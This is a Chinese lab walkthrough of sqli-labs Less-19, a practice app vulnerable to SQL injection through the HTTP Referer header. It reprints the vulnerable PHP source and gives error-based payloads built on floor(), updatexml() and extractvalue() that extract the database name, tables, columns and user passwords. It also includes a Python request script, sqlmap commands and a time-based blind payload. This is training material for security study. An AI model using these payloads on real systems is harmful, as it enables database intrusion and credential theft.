sqli-lab-less19
一、靶标地址
Less-19 POST-Header Injection - Referer field-Error based
#响应头Referer注入
http://127.0.0.1/sqli/less-19/
二、漏洞探测
输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#发现回显Your IP ADDRESS is 127.0.0.1
#Your Referer is: http://127.0.0.1/sqli/Less-19/
猜测业务逻辑流程会insert referer
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)#对特殊符号进行转义
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
/*
echo 'Your Your User name:'. $uname;
echo "<br>";
echo 'Your Password:'. $passwd;
echo "<br>";
echo 'Your User Agent String:'. $uagent;
echo "<br>";
echo 'Your User Agent String:'. $IP;
*/
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'Referer:'.$uname."\n");
fclose($fp);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your Referer is: ' .$uagent;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());#报错回显
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
四、黑盒与白盒测试
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
Postdata:
uname=admin&passwd=admin&submit=Submit
Referer:
1'
#Your Referer is: 1'
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1')' at line 1
Postdata:
uname=admin&passwd=admin&submit=Submit
Referer:
1')
#Your Referer is: 1')
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '127.0.0.1')' at line 1
Postdata:
uname=admin&passwd=admin&submit=Submit
Referer:
1'))
#Your Referer is: 1'))
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')', '127.0.0.1')' at line 1
猜测不出语句,只能知道会出现报错
在实际猜测中最好对' ') '))都进行测试
1、floor()函数报错
#获取数据库 用户 版本号
Referer:
1' and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#因为update语句无法使用union select,所以用and并将后面()
#获取表名
Referer:
1' and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#获取列名
Referer:
1' and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#获取用户名
Referer:
1' and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
2、updatexml()函数报错
insert into referers (`referer`, `ip_address`) values ('$uagent', '$IP');
#获取数据库名
Referer:
1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '
#insert into uagents (`uagent`, `ip_address`, `username`) values ('1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '', 'a', 'b');
#后面是and'的原因是需要闭合前后两个引号,保证values后面的参数格式
#第一个参数是'1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and ''
select '1' and '2' and '3';
#1
#获取数据库名的第二种方式仅供参考
#补充一点:这里并不是URL而是HTTP头,所以+并不会被转义为(空格),于是末尾的注释符号要变为#。
1' or updatexml(1,concat('#',(database())),0),' ')#
1' and updatexml(1,concat('#',(database())),0),' ')#
#这里是直接补充了value的两个空参数
#获取表名
Referer:
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) and '
#获取列名
Referer:
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) and '
#获取列字段
Referer:
1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) and '
3、extractvalue()函数报错
#获取当期数据库名
Referer:
1' and extractvalue(1,concat(0x7e,(select database()))) and '
#获取表名
Referer:
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
#获取列名
Referer:
' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) and '
#获取列字段
Referer:
1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) and '
Referer:
1' and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) and '
五、脚本撰写
import requests
url="http://192.168.128.159/sqli/less-19/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Referer':"1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '"
}
payload = {
"uname" : "admin",
"passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-19/" --data "uname=admin&passwd=admin&submit=Submit" --referer="" --level 4 --batch
#未探测出
#lever>=3才会去检查referer头是否存在注入漏洞
sqlmap -r target.txt --level 4 --batch
#未探测出
或者
sqlmap -r target.txt --batch
#需要把Referer的值设置为*
Parameter: Referer #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 5895 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(5895=5895,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VQiK'='VQiK
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ' AND (SELECT 1222 FROM (SELECT(SLEEP(5)))JeeH) AND 'qpHE'='qpHE
POST /sqli/less-19/ HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: *
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
uname=admin&passwd=admin&submit=Submit
七、总结
1、对HTTP头的注入,不要受限于Referer和User-Agent两个头,要具体看能回显的参数
扫一扫
788
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
